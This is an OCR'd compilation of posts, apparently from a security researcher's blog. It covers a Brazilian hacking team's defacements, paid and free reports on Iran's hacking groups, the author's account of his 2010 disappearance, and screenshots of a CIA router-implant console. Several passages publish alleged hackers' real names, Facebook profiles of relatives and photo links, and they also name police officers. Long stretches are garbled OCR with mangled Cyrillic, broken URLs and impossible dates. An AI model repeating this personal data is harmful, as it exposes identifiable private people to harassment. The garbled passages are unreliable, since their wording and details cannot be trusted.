Worked at Pais de Primeira Viagem. SS Sache Games a 
Lives in So Paulo, Brazil 
From Sio Paulo, Brazi 
Married to Brunac Maglia 
Followed by 175 people 


Studied at Ensino fundamental 


fh none “ - 


theaqunro.net 


Thiaguinhe hackeado por LearnersOfCuricsity 


Atena Unkeown Mandrive~ linux 


Um salve para 
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Hi admin, nothing personal, moving here just to have fun !! 


hackeado por HighTech Brazil HackTeam 


--melhor amigo que jé tive ;) 


ia minha pequena ; 
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Twitter Social Media Accounts known to have participate in the campaign: 
https://twitter.com/xFellipeCT 

https://twitter.com/Kouback _TR _ 

https://twitter.com/b1tchx _ 

https://twitter.com/synchrOnize 

https://twitter.com/aceeeeeeeer 

https://twitter.com/HADESUnsekurity 

https://twitter.com/slayer owner 

https://twitter.com/Whiskpentest 

https://twitter.com/LulzSecRoot 


https://twitter.com/unknown _br 
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https://twitter.com/Atena Unknown 


https://twitter.com/MandrivaL 


Personally Identifiable Information on High Tech Brazil Hack Team Team Members: 


¢ synchrOnize 


Real Name: Bruno Maglia 


Facebook Account Profile: https://www.facebook.com/brunoa qnp ; 
https://www.facebook.com/brunao.maglia 


Related Facebook Account Profiles: https://www.facebook.com/paula souzzaa; 
https://www.facebook.com/francine.maglia - https://www.facebook.com/caio.favaratogalvao - 
https://www.facebook.com/keli.favarato - https://www.facebook.com/fabiano.galvao.18 


° aceeeeeceer 


Real Name: Gustavo Gemen 


Personal Photos: http://imgur.com/zdRoh33 - http://imgur.com/mMQfN8jk,49aNcs6,dCQYCgc- 
»XPtKSAB ; http://imgur.com/eKWbZDn,l|OiHr7A,HKu5Jw8; http://imgur.com/eKWbZDn,|OiIHr7A, HKu5Jw 


Facebook Account Profile: https://facebook.com/gustavo.gemen 


Related photos: 
http://imgur.com/hZDJSNb,PXjcBsR 
http://imgur.com/V6YuIBs,B6CgXKo 


http://imgur.com/8wmqbGg,ZKUjM1Q, vVKECfQf 
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http://imgur.com/GTliRul, GLtvIZl, vfyAhuu 


Related URLs: 
https://www.youtube.com/channel/UCBgeuuT 9sdFOOkFoGnt1p6w 


https://koubacktr.wordpress.com/ 


I’ll be soon posting an additional set of details on the High Tech Brazil Hack Team and 
I'll be definitely looking forward to sharing the necessary details with the Security Industry 
and Law Enforcement in an attempt to track down and prosecute the individuals behind these 
campaigns. 


Stay tuned! 
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2020 


16.1 January 


16.1.1 Subscribe today! (2020-01-08 18:18) 


Dear blog readers, 


Surprise, surprise. After a decent period of time while | was busy working on several 
high-profile [1]personal projects | can finally let everyone know that I’ve just joined forces 
with team Box.sk the original owner of the infamous [2]astalavista.box.sk search engine for 
cracks and serials and that I’ve launched a high-profile blog on the Box.sk domain including 
several high profile upcoming Hacking Security and Privacy projects. 


How you can help? Bookmark the blog today and consider giving me a hand with build- 
ing a high-profile Newsletter of friends and colleagues and blog readers by subscribing 
[3]here. 


Stay tuned! 


1. https://box.sk/wordpress 
2. https://en.wikipedia.org/wiki/Astalavista.box.sk 
3. https://mailchi.mp/b2781679541e/ddanche 
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16.1.2 New Report - "A Qualitative and Technical Collection OSINT-Enriched Analysis 
of the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane 
Digital Security Team" - Grab a Copy Today! (2020-01-27 16:18) 


Dear blog readers, 


Dancho Danchev Presents! Brace Yourselves! 


Grab today a free copy of the Second Free. 

Exposing Iran's Hacking Scene OSINT-Enaétied and 
Technica gonggtion Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 


Organization including Individual Researcher Use - This 1s 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


Commercial Copy Available! Approach me toda 
pprnec yo r Manager 1og8 mpower your Threat 
Intelligence Team! An OSINT Conducted Today is a 
Tax Payers Dollar Saved Tomorrow! 


https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


It’s a pleasure and an honor to let you know of a recently released commercially available 
report on Iran’s Hacking Scene entitled - "A Qualitative and Technical Collection OSINT-Enriched 
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Analysis of the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital 
Security Team" which is priced at $500 for unlimited distribution copies within your Team and 
Organization and can obtained from [1]Jhere. 


An excerpt: 


"IN a cybercrime ecosystem dominated by fraudulent releases and nation-state actors 
including possible high-profile “sock-puppets” and cyber proxies type of rogue and potentially 
superficially engineered cyber warfare tensions it should be clearly noted that a modern 
OSINT and virtual HUMINT actionable threat intelligence analysis of major and prominent 
cyber actors should take place for the purpose of setting up the foundations for a successful 
cyber actor monitoring including possible offensive and couter-offensive tactics techniques 
and procedures for the purpose of profiling and acting upon the gathered and monitored 
intelligence should take place through the automated and systematic Technical Collection 
and OSINT enrichment of the gathered data for the purpose of empowering the necessary 
decision-makers and third-parties with the necessary data information and knowledge includ- 
ing hands-on tactical and strategic intelligence to work with and act upon." 


Another excerpt: 


"In this report I'll provide in-depth analysis of the Iranian Hacking Scene and potentially 
its use of offensive and defensive cyber warfare practices including possible capability 
measurement and estimation in terms of technical capabilities and offer in-depth technical 
and qualitative analysis of some of the key factors that actually drive the Iranian Hacking 
Scene including in-depth Technical Collection material and OSINT gathered artifacts to assist 
in the process of acting upon the growing threat posed by Iranian Hackers and the Ashiyane 
Digital Security Team internationally with the idea to empower decision-makers and the 
Industry including third-party stakeholders with the necessary analysis to act upon and take 
measures against in terms of offensive and defensive cyber warfare operations and actual Law 
Enforcement tracking down and prosecution including never-published and released before 
personally identifiable information on the Ashiyane Digital Security Team including its key 
members including a never-published before Social Network Analysis Graph of Iran’s Hacking 
Scene and Iran’s Hacking Underground." 


Interested in obtaining a copy? Approach me at dancho.danchev@hush.com today and 
inquire about purchasing it and I'll shortly get back to you with additional details on how to 
obtain copy of the report. 
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Stay tuned! 


https: //unit-123.org/product/a-qualitative-and-technical-collection-osint-enriched-analysis-of-the-irani 


an-hacking-scene-through-the-prism-of-the-infamous-ashi 


16.2 February 


16.2.1 Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic 
of Bulgaria (2020-02-03 10:41) 


Dear blog readers, 
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As it’s been eight years since my [1]disappearance and possible kidnapping and harass- 
ment attempts - | wanted to seek my blog reader’s urgent assistance through email and 
possibly phone - regarding my disappearance with anyone out there who knows or have 
information regarding what took place in 2010 - including current and former colleagues law 
enforcement colleagues and Intelligence Community partners. 


Bulgarian News Reports Dancho Danchev Institutionalized 
Monday, January 17, 2011 


Contributed By: An article on Bulgarian news website "Dnevnik" reports that security researcher Dancho 
Headlines Danchev was placed in a mental hospital in early December of last year. 


Dancheyv, an information security researcher and author, was reported as missing since late 
summer 2010, according to an article in New Zealand based ZDNet 


Danchev was thought to have disappeared under mysterious circumstances after an unnamed source revealed they 
had received a letter in September of 2010 in which Danchev outlined concerns that he may be under surveillance 
from the Bulgarian government and could face prosecution 


Circumstances surrounding Danchev's apparent admission to a mental hospital are unclear, but a rough translation 
of the Dnevnik article on Dachev's institutionalization is as follows 


Dancho Danchev, an expert on cybersecurity, is accommodated in a Bulgarian hospital. The information was 
confirmed by two sources of "Diary", although from the hospital refused comment. 


As Wired magazine announced a few days ago, he disappeared in September 2010 and did not meet their 
coordinates, Twenty-six year old Dancho Danchev writes for the blog Zero Day, part of the news site zdnet.com. His 
last post there is from August 2010 


In early September, sent an e-mail to the editors of zdnet.com , informing them that the bathroom he installed 
listening devices. In addition, attached photos of the electric transformer and torn wires on the bulbs. In his letter 
Dancho Danchev said that the Bulgarian intelligence services monitor it because it was recommended by the FBI 
Attaché in Sofia for an expert in the local center against computer threats. 


Then keep track of Dancho Danchev disappear, but according to reliable source of "Diary" he hospitalized from 
December 11 onwards. It is now stabilized and will soon be discharged, our source said. 


Expect more details 


ZDNet had reported they received a tip from a Bulgarian source who indicated Danchev was in some sort of serious 
predicament which prevents him from making contact 


“Danchos alive but he’s in a lot of trouble," the source was quoted as saying 


Dancho Danchev is is highly reputable malware researcher and blogger who has made significant contributions to 
the information security field 


I’ve been recently featured at [2]WikiLeaks including the [3]Snowden archive including a 
[4]SCMagazine nomination and can be reached at dancho.danchev@hush.com or you can 
leave a message at - +1 646 419 4540 or reach out to me directly on my mobile - +359 87 
68 93 890 or use this XMPP/OMEMO user ID for real-time communication - 90184@armadillo- 
phone.com 
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he case of Dancho Danchev's going missing is now beginning to turn into a story of either potential mental 
illness, or, that of a classic tale of Bulgarian secret services removing a problem. It would seem that today, 


after Dancho’s being missing since September, reports are coming out that he was in fact in a mental health 
Eee ei rwuelicemeceisie The story is still coming to light, but, the case does present some interesting 
ideas for anyone in the information security business like Dancho or others (@ioerror etc) who might poke 
certain forces in the eye with their research and reporting. 


In the case of Dancho, he seemed to be indicating by the email sent before his disappearance, that he felt he 
was being surveilled electronically as well as perhaps physically. The images in the email are not conclusive of 
anything that would indicate a bug or surveillance system had been placed in his house. However, this is not 
to say that the inverter that he found could not have been used in some way for such a system. Usually such 
bugs are small and powered by batteries or, in the case of the higher tech ones, piggyback off the power of 
the phone lines or hard wire electrical systems. Depending on the power requirements though, the inverter 
may have indeed been something that was used to alter power for operational function. 


Surveillance technology aside, the fact is that Dancho, who's blog | am only now coming aware of, does have 
some potential information that could have poked the wrong badger. The badger in this case would be 
Eastern bloc baddies who are making money off of botnets and malware that Dancho was revealing in his 
ZDnet blog and his blogspot. He perhaps hit a little too close to home for someone and they just made a call 
to the state security apparatus. Or, maybe in fact, he has begun to manifest symptoms of schizoid behavior, 
he is after all, in the right age range to do so. However, given a read through his writings online, | cannot at 
present see anything that leads me to believe that he is manifesting a mental illness here. His postings are 
cogent and have none of the aphasia characteristics that would lead anyone to believe he is ill. 


Current situation: 

- illegal arrest using stolen ID kidnapping and trashing of my place including illegal relo- 
cation to an unknown location in the town of Lovech without a single word on the reason for 
stealing my ID and holding me confined there for a period of three months 

- twisted arm 

- twisted eye 

- assault by my father and three police offers 

- my mother took the liberty to steal my personal ID circa 2010 and hand it over to three 
unknown police officers and pay for the unknown car fuel using her company’s name and take 
me to live in an unknown location and actually made it to this [5]blog 

- something appears to be wrong my eye 

- something appears to be wrong with my neck 


- something appears to be wrong with my nose 


- I’m currently experiencing a pressure on my arm 
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- harassment by a DANS agent named Vasil Stanev 


- which leaves in a home molestation situation with no sign of legal action and law en- 
forcement assistance 


je da rré naphihete sactnhtenie — dete sum - vertoven. apecisiiat, v, terete, 


4 peeve | whetebiusing totitveront, | finarsovo ruihtertvo. » iqven 


2, « horidors. Sunbtote, bce, napuuba, pubistrichnoto, zavedenie 
ark 23 1acgovor mi ve obqnava che maga da ve 
tachods v Lowech 
V pouedutte - ngholkn godin’ po tunno - dwe repornati fica 1 polical ot Grad Troyan poweshtawat doma mi ra ds me darugt ued hoets me zavedat do polcigts | me Larat da piuha che moite eredi viqt na tehedtata | na policiq Troyan 
4 50 sdaget Injekcd of hetto Rana fubde ber moe mente | ber moe pelente | ber fealne o1noweteine prichine 


V produljente 1a Owe godin ber moe 


V godinats 2028 nepornate lice + drugs neparnate lice prechLavanhto te ra Vewl Staney of Dam me pouhedbises ra ds ou predlegs tabota | da me kara da hodg na dolor Lice koeto ne pornavam » Tinks Antimovs - lichen bebar moholko put! me turd 


ta Ge Sewers brv« 


atria Lovech ¢ 28 podnowevane na peng bez moe rarte | vuglaue ot kogto aqmam rmujda | doktor-s Lito © otgovoren ra penugts - Ganev - me zavejde na chen rargovor ued koeto me 


47, prodviwem, mogta, rabota, « stecata, na, kompaterna, sigurnont i bin, jetal, da, podam ugeal-jalbe otnoto utuacigte 


modus COdmOntT aren LORbreteN OL gover CONS sheecnyte ber de bude ode rpchoqvane men | MmCElO semeHIVO 


The results: 
- $80,000 personal amount lost due to harassment and vandalism 


- | didn’t get an actual copy of the document that my equipment was interfering with 
that of the local police station 


- my mother stole my ID for a second time to enlist me in social security services 


- the DANS agent that visited me - Vasil Stanev - asked me to attend a doctor session 
and asked me to work for him and made a copy of a research document in my place 


Local Names of Local (City of Troyan, Republic of Bulgaria) Inspector Names responsi- 
ble for the illegal entry in my place including the illegal stealing of my Personal ID including 
the illegal 3 months illegal presence in another town confined: 


¢ [6]Mapuu Moes Mapunos 


¢ [7]Naspnun Crosnos Feoprues 
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¢ [8]Kpacumup Muxos Kones 


¢ [9]Tuxomup Hav geHos CnaBkosB 


¢ [10]Cteqdan UsaHos Munes 


¢ [11]AHaTtonu MnameHos Tpvndouos 


¢ [12]CTaHumup Lloyes WHKoBcKu 


¢ [13]MsBan Henankos UsaHosB 


¢ [14]Mupocnas CronvkoB Muxanvnos 


¢ [15]Bacun Moes FayescKu 


¢ [16]Boxugap Bankos Metpos 


¢ [17]Becko LlBeTaHosB MuHKOoB 


¢ [18]Momunn CTreqdanos Lloves 


¢ [19]MuHko CTosHoB MvHKOB 


¢ [20]Teopru Mutkos Unnues 
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4a ENHKPH3A 


utes, na 27 roznHnE 


Tloon 3a macrosmara xocnnTaansanas: Nocrhmna 2a NIpbs ITLT } 


MCHXHATPHMCH CTAltOHAap H AO HACTORUUIA MOMCHT He ¢ TOAzBA 
(GRCLIMAAHSHPaHa NCHXHaTpHYHA .Gomout Jlopezou c Mpegwera Ha,PY wm 
MBP.» Tpost er Valen oI. - 7 


4 + kant Ah PTA 
or hors OT -POUITEATe BPOMABEWA.B poBexenHeTO ARTHpA o 
MONAT OHA MECC JOAM, KOLATO, GAMHHGA TA WHC? CAM Ha KBaprHpa 3 
Losbuszcdipes srepsua sMeceu noAEpeKaA EKERHEDHA BpLaKA c TAX Me 
cResepona, KO: Cac TOBA cnpaA nace ofaxza. Ha nosBbHTBAnHA OT TAXH: 
ACTPRME TC OFNOBAPHA HAH H3KAIOUBA TeaedboruTe cH. ToBa rH MpHTecHHtao 1 
Te 3ANOWHAAM 2a TO H3AHpHaT AKTHBHO. Tloay4HaH NHCMO OT XA3aHHA, 4e A 
15.09.10r. tpa6sa ma ocnoGoaxt KBaprupaTa, a Taka Chto MH MAKOAK: 
DGamgAHNIA 98 HETAATCHH ANIHMFOBH BHOCKH 3a 3aKyNeH OT CHHA MM AarrTon 
Ha nocotenara zata Te orminan » Cocbia, KEueTO HaMepHAH CHHA CH a cr 
8 kuapripata. Orkasnas 2a ropopH ¢ Tax, 64a rpy6 H xsaneH. CeOpaan wr 
Sareaxa 30028 ce BLpHat » Tpoan, Tol mt ocrapia npea KeapTupata no; 


. MPSMACr, 4e © 3aCT HH JAMHHAA BAKE C TaxcH. Cac 3aBpbulanero B Tpos) 


OTKAIGRAA JA KOHTAKTYBA C POJITCANTe HC Apyru noanaTH. SaTBapAA ce 1 
“GHA B CTASTA Cit, OTKAIBAA Aa Ce Xpantn saeco c Tax. Hamyckaa gZoma cH 6c 
‘RA masa OOACHCHHA KBe XOMH HM Kora ute ce BEpHe. Mpomanara 1 
SROMCACURCTO My SHAG’ sKONCTATHpaHA HM oT cDcemH HM OMpHATeAH Hi 
pcemelicrporo, Konto Jlanyo, momMMMABaA KATO Halrbano nenosHaTH. pr 
oTmpanent sa6cacKKH OT Crpana ta Majikara ,3arouBaa fa araesa AouIO” 
Hapcskne xomea C MpeHoOcHMHa KoMnioTDp. Tacmaa TeaeBHaita oT OKO 


MCThP PASCTOAHHE, SAKAIONBAA H ITO HAKOAKO IThTH MpopepaABAA BXOMHAT: 
Bpata Jegaxsiovena. Herrocpeactscno mpeg HaMecaTa Ha NoOAMLUMAT: 
sanouTad 10» CMCCBAA CNOMEHH OT JETCTBOTO C HACKOp: 


can Cevieuuy YROTPEGABAN MHOTO KOMMOTHpHH TEPMMHM ZO CTeMeH 4: 
Repasdupagsaocr. 


Primary contact points that you should reach out to in case you’re concerned about my 


well-being and whereabouts: 


[21]Troyan Police - Email: police troyan@abv.bg 
[22]Troyan Hospital - Email: mbal troyan@abv.bg 
[23]Lovech Psychiatry Clinic - Email: dpblovech@abv.bg 


[24]Troyan Municipality - Email: mail@troyan.bg 
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My urgent request: 


- Can you please donate any amount to my PayPal ID: dancho.danchev@hush.com which |’Il 
use to relocate as soon as possible 


- Can you please reach out to the provided email contact points with local law enforce- 
ment and the people responsible and let them know what do you think 


My second request: 


- Do you maintain an internal Underground Forum monitoring service? Are you aware of 
any Underground Community chatter referencing me and my research including [25]disap- 
pearance and personal blog similar to [26]this post? 
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- Do you keep in touch with law enforcement? Can you possibly make an inquiry and let me 


know personally regarding any information regarding my disappearance and whereabouts 
circa 2010? 


- Has anyone ever approached you regarding my disappearance? Are you aware of any 
information regarding my disappearance including possible internal organization chatter 
law enforcement outreach or possible news tips? Can you possibly approach me personally 
with additional information that you might be aware of regarding my disappearance and 
whereabouts circa 2010? 


Stay tuned! 


1. https: //adanchev. blogspot con/2018/04/dancho-danchevs-2010-diseppearance hall 

2, netps:/ /wiki Leaks org/hbgary-onais/enailid/69427 

3, https:/ /search.edvardenowden.con/doce/LOVELTHORSE201S-02-04_neadocs_snowden, dod 

4. https://wwy.scnagazine.con/hone/events/sc-social-nedia-avares/ 

5. https://krypt3ia.wordpress.com/2011/01/17/the-nrs-dancho-danchev-and-a-beautiful-mind/ 

6. https: //www. google. bg/search?source=hp&e i=hHMwXvyhCoH6sAfn6 JLIAw&q=7%22%D0%9C%D0/ABO%D 1%80/AD0%B8%D0%,BD+/,D0% 
%DO“LBE/ADOZBS54D0%B2+/%D0%9C ZD0%BO%D 1%80%D0/%B84D0/%,BD/D0% 


DO%B2%,D0%,BO/%,D0%BD/,DO“BEADO/,B2+/,D0L9C4DO%B8/4D0%BBADO/ABS/ 
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ttps://www. google. bg/search?ei=4HMwXpbmE6_nsAfkwKTABg&q=/22/,D0/A1%D 1%82/,D0/,B0/%,D0 “BD /D0%B8/%D0/%BC%DO/%BE/ 
17,80+/D0/ZA6/,DO/,BEAD1%87 LDO/A,B5/4,D0/%,B2+/%D0/,98/,D0ABDADO/BAL, 

ttps://www.google.bg/search?ei=7HMwXrTbFYydsAf9s5nICgk&q=/%22/,D0/%98 4D0/%B2/,D0/,B0/%D0/%BD+%D0%9DADO%B5 D0 /AB4/, 
D1%8F /DO/ABBADOABALDOXBEDOZB2+/%,D0%,98%,D0/B2/%,D0/%,B0/%,DO/%BD% 

ttps://www.google.bg/search?ei=9XMwXqemFKv5sAf KiSCoDwk&q=/,22/%,D0%,9C7%D0/%B84D17%,80,D0%BELD 18 1%,D0/BB/4,D0/%BO%, 
B24 ZD0%LA1%D1%82/%,D0/,BEADOLBOLDOLBALDOLBEADOLB2+/,DO/A9CK 

ttps://www.google.bg/search?ei=D3QwXv- fLYZEkgwW347 v4DQ&q=%22%,D07,92%D0/,B0%D1%81%D0/%B8 4D0%BB+%D0/%9CL,DOABE/ 
DOZB5%D0%B2+%D0%93%D0/%,B0%D1%87 LD0%B5 4D0%B2%,D1%81/,D0/,BA/ 

ttps://www. google. bg/search?ei=GnQwXtiwkZKdsAfxkp5gk&q=/22/%D0/9 1,DO/ABE ADO ABE /,DO%BEADO/AB4/4,D07,B0%D1%,80+/,D0 
49 17%D0%BO/%,D0%BD,DOZBALDO/,BELDO/,B2+,D0L9F LDO/ZB5S%D1/%,82/D 1% 

ttps://www.google. bg/search?ei=JnQwXpGLCYP6kwWt8rxXIAQ&q=%,22%,D0/%92/%D0/B5/4,D1%81,D0/BAADO/BE+/,D0ZA6 ,D0/B2%, 
DOYZB57%D1%,82/4D0/%B0%,DO/%BD/ADOABEADOUB2+~D0L9C7%,DO/XB8/,DOABD/ 

ttps://www.google. bg/search?ei=MHQwXteUJYrLkwXY Opel Awk&q=/,22/%D0/%9C7%DOLABEADOLBC/D1%87 ADOULBEADO/,BB+/,DOLA 1% 
D1%827%D0%B54D1%84%,D0/%,B0/%DOABDADO/X,BELDOZB2+/%D0/,A6 ,D0/ABEL 

ttps://www.google. bg/search?ei=UHQwXtSXGcGVkwXi0JuABA&q=/,22/%D0/%937%D0/B5 ,DOABEAD1%,80%D0/,B3Z4D0/,B8+ ,D0L9CZ, 
DOYZB87%D1/%,82/4D0/ABA/Z,DO/XBE/ADOZB2+/%,D0/,98,D0ABB/,DO/LB8/,D0/AB5/ 
2. 
22. 
23. 
24 


25. |https://web.archive.org/web/20110120170150/http://warintel .blogspot .com/2011/01/dancho-danchev-missing. 


tml 


26. https://darkode.cybercrime-tracker .net/index.php?dir=Random/20interesting/20stuff/Dancho%20Danche 


16.3 May 


16.3.1 Two High-Profile OSINT and Technical Collection Analysis Reports on Iran’s 
Hacking Scene and the Ashiyane Digital Security Team - Available for Free! 
(2020-05-21 00:56) 
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Dancho Danchev Presents! Brace Yourselves! 


Grab today a free copy of the Second Free. 

"Exposing Iran's Hacking Scene OSINT-Enaétied and 
Technica gonection Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 


Organization including Individual Researcher Use - This 1s 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


ppraach yo r Manager today! Empower your Threat 
intelligence Team! An USINT Conducted Today is a 
Tax Payers Dollar Saved Tomorrow! 


Commercial Copy naee today roach me toda 
‘0 


https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


Dear blog readers, 


It’s a pleasure and an honor to let you know that I’ve just made [1]two of [2]my most 
important and high-profile studies on Iran’s Hacking Scene and Iran’s Hacking Ecosystem 
including a high-profile and never-published before SNA (Social Network Analysis) of Iran’s 
Hacking Scene using Maltego publicly accessible with the idea to get more people to read 
them and actually act upon them potentially assisting the U.S Intelligence Community and 
U.S Law Enforcement on its way to track down the prosecute the cybercriminals behind these 
campaigns. 
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I’ve decided to share direct download copies of the two reports with the idea to assist 
you and your team including possibly a vendor or an organization on its way to catch up with 
what Iran’s Hacking Scene has been up to including the infamous Ashiyane Digital Security 
Team in the context of offering an in-depth and never-published before OSINT analysis on 
Iran’s Hacking Scene including an in-depth and comprehensive SNA (Social Network Analysis) 
graph of Iran’s Hacking Scene using Maltego. 


¢ Consider going through the following [3]post to go through an OSINT analysis on the FBI’s 
Most Wanted Iran-based cybercriminals including actionable intelligence and in-depth OS- 
INT analysis including a SNA (Social Network Analysis) graph of Sun Army Team Members, 
ITSec Team Members, and the Mersad Co. company. 


An excerpt from the first report which you can grab from [4]here: 


"In this report I'll provide in-depth analysis of the Iranian Hacking Scene and potentially 
its use of offensive and defensive cyber warfare practices including possible capability 
measurement and estimation in terms of technical capabilities and offer in-depth technical 
and qualitative analysis of some of the key factors that actually drive the Iranian Hacking 
Scene including in-depth Technical Collection material and OSINT gathered artifacts to assist 
in the process of acting upon the growing threat posed by Iranian Hackers and the Ashiyane 
Digital Security Team internationally with the idea to empower decision-makers and the 
Industry including third-party stakeholders with the necessary analysis to act upon and take 
measures against in terms of offensive and defensive cyber warfare operations and actual Law 
Enforcement tracking down and prosecution including never-published and released before 
personally identifiable information on the Ashiyane Digital Security Team including its key 
members including a never-published before Social Network Analysis Graph of Iran’s Hacking 
Scene and Iran’s Hacking Underground." 
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An excerpt from the second report which you can grab from [5]Jhere: 


"This qualitative analysis (45 pages) seeks to assess the Computer Network Operations 
(CNO) of Islamic Republic of Iran, through the prism of the adversary’s understanding of 
Tactics, Techniques and Procedures (TTP), a structured and geopolitically relevant, enriched 
OSINT assessment of their operations, consisting of interpreted hacking literature, videos, and, 
custom made hacking tools, extensive SNA (Social Network Analysis) of the country’s Hacking 
Ecosystem, real-life personalization of the key individuals behind the groups (personally 
identifiable photos, personal emails, phone numbers, Blogs, Web Sites, Social Networking 
accounts etc.). It’s purpose is to ultimately empower decision/policy makers, as well as 
intelligence analysts, with recommendations for countering Islamic Republic of lran’s growing 
understanding and application of CNO tactics and strategies." 


* Overview and In-Depth Analysis of Iran’s Most Popular Hacking Groups 
¢ Personally Identifiable Information and Enriched OSINT Analysis 


¢ Iran Hacking Group’s Team Members Personal Photos 
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¢ Iran Hacking Team’s Personal Group Photos 
¢ Personal and Group-Published Hacking and Security Tools 
¢ Analysis of Iran’s Cyber Academic Sector 


¢ Social Network Analysis Maltego Graph 


lran-based Hacking Groups and Team covered and discussed in-depth: 


* Overview and In-Depth Analysis of Iran’s Most Popular Hacking Groups 
¢ Personally Identifiable Information and Enriched OSINT Analysis 

¢ Iran Hacking Group’s Team Members Personal Photos 

¢ Iran Hacking Team’s Personal Group Photos 

¢ Personal and Group-Published Hacking and Security Tools 

¢ Analysis of Iran’s Cyber Academic Sector 


¢ Social Network Analysis Maltego Graph 


Enjoy! 


1 fittps://adanchev .blogepot.con/2020/01/ney- report qualitative-and- technical btall 
2, heepe: //adanchev blogspot. con/2015/0T /assessing-computer-network- operation, 29. tal 
3, https: //adanchev blogspot. con/2019/04/exposing-irens-nost-vanted. ita 
bree, tat serenity n/ppers/gemal Iara 


16.3.2 The Relevance and Irrelevance of CIA’s Vault 7 Cyber Weapons Arsenal - An 
In-depth OSINT Analysis (2020-05-21 19:29) 


7 01001001 gid? ryo* 
1 01000001 91 


‘ON opeRAT 


In a World dominated by buzz words such as military defense contractors entering the World 
of cyber warfare through the supposedly proposed cyber weapons inventory that they could 
supply to their clients and a multi-tude of third-party cyber weapon and legal surveillance type 
of solution providers it shouldn’t be surprising that the CIA’s most recently launched Center 
for Cyber Intelligence including the actual existence of the CIA’s Information Operations 
Center which is responsible for producing and actually working on the production and release 
of nation-grade cyber weapons are already making a decent portion of contribution to the 
U.S Intelligence Community of terms of building and actually working on high-profile and 
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nation-grade cyber weapons thanks to a recently released and leaked by Wikileaks archive of 
CIA cyber weapon documents. 


In this post I'll offer an in-depth discussion and analysis on the relevance and irrelevance of 
CIA’s cyber weapons program in the global context of the U.S Intelligence Community includ- 
ing the actual applicability of such type of weapons in today’s modern security researchers 
and anti-virus vendors dominated world including to actually discuss in-depth the technical 
specifications behind the CIA’s Vault 7 cyber weapons program including to actually make a 
vast and sound recommendation in terms of improving them including the associated risks 
involved in the program and the actual execution of such type of cyber weapons. 


Chen ¥ Blossom Plan Flytraps 


Options: 
¢ Create a Flytrap 


Name 
Starter Flytrap Belkin Serial 00;17:3F;40:98:86 Belkin/F5D8231-4/v4/4_00_16 ¥ 
Create 


« Edit Flytrap 
Belkin Serial 00:17:3F:40:98:86 ¥ 
Select 


« Delete Flytrap 


CPE0450 - 9E:09 00:21:80:F0:9E:09 ¥ 
Delete 


v 


Last Alert: 2010-11-30 18:32:20.0 Target: heliotrope111 Current Time: 2010-12-17 18:21:13.241 


7220 


Gionwe aveccen Add Flytrap A 


verse 4 | . NewF! trap h 
Base Flytrap 
NewFlytrap 00:17:3F:XX:XX:XX Belkin/F508231-4/v4/4_00_16 ¥ || Apply |twit rose edits f applied) 
Name Location Group Child Group 
NewFlytrap SLO 
WLAN MAC = 00:17-3F:Xx:XX:XX 


LAN MAC = (00:17:3F:XX:XX:XX 
Make/Model/HWIFW =| Belkin/F508231-4/v4/4_00_16 v 
Estimated Initial Beacon Date =/37 pec 2010 =i 


Next Mission = M Test 1 (Active) 


Flytrap Applications 


i M Test 1 (Active) v 


mere 


Update 
Back to Plan Flyiraps h i 


» 


‘Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time: 2010-12-17 18:22:05.322 


7221 


Gicnw avec Flytrap Overview ah 


<<<1s>> 


Name a Location ln Com VPN Link Harvest Data Current Mission 
Belkin Serial 00:17:3F 40:98:36 SLO No N/A View M Test 1 
cb-vpn PoP 192.12.16.81 LAN=00:1D:7E:DC:2A:69 SLO No N/A N/A cb-vpn 192.12.1€ 
CPE0450 - 8C:A2 LAN=00:24:A1:7D:8C:A2 No N/A N/A at-35 
CPEi775 LAN=00:23-EE:10:58:6F No NA N/A at-35 
CPE0450 - 9E:09 00:21 :80:F0-9E:09 No N/A N/A None 
cw 1 4:A1:68:41 No NIA View ORT-5.1 
CW _2LAN=00:24:A1:7C:F5:CA No N/A N/A ORT-5.15 
ET3 00:13:10:44:98:AD SLO No Down WN/A § test zakura VP 
J Serial 320N 68:7F:74:29:4B:AA Scott Office No Down N/A $ test vpnlink gla 
Little Bird-750 LAN=00:1E:46:1D:79:02 No Down N/A § test vpnlink gle 
MKIT Belkin 00:17:3F:40:01:7C SLO Killed N/A View Kill M KIT Belkin) 
MKIT Linksys WRTSOON v2 00:18:39:90:18:C4 SLO Killed N/A View Kill M KIT Linksy 
MKIT WATS4GL 00:25:90 :47:73:F5 SLO No NIA View M Test 1 
SlimBoyFlyTrap 00:25:90 :38:D3:5B Firebaugh, CANo N/A View GlobalShield 
SLO flower LAN=00:1E:46:1D:79:14 No Down View $ test zakura VP) 
test planned ft LAN=00:24 :A1:00:00:00 No NA N/A None 
00:22:80:C8:E0:07 No NIA N/A default passive Ic 
77:77:77:77:77:77 No N/A N/A ORT-5.4 
99:99:99:99:99:99 81.3,1108 No NIA N/A default passive I< 
LAN=00:1E:46:1C-DF:42 No WA N/A default passive |< 
<<<1>>> 
Fee ? ie 
Last Alert: 2010-11-30 18:32:20.0 Target: heliotropel11 Current Time; 2010-12-17 17:46:42.221 


7222 


LAN Netmask Bits «24 

WAN Netmask Bits «0 
PMP Address = 
Beacon ee rent = 192.12.16.61 


Status History 


Date LAN IP 
2080-12-33 37:42:55.0 192.168.3.2 9 
2010-12-03 01:13:26.0 192.168.1.1 
2020-12-03 03:12:25.0 392.166.3.1 62 
2010-12-03 01:11:26.0 192.168.1.1 


Security History 


Date ek aoe == WPA Pre-Shared WPA Radius Key WPA Radius Server IP WPA 


2010-12-03 01:13:26,0Neme : 


J Serial 320N 
de 
Description: 
General Information Mission Information 
Current Mission « 
Name =) Serial 320N [IE ON Ee meee 
at = coecuag Se 2010-12-13 17:42:55.0 
Group = 
Number of =o 
Wireless LAN MAC = 68:7F:74:29:4B:AA = 
Beaces Traffic Requirement = None 
Ld | 
Beacon Power Cycle = 30 Secs 
Current Mission Status = Delivered 
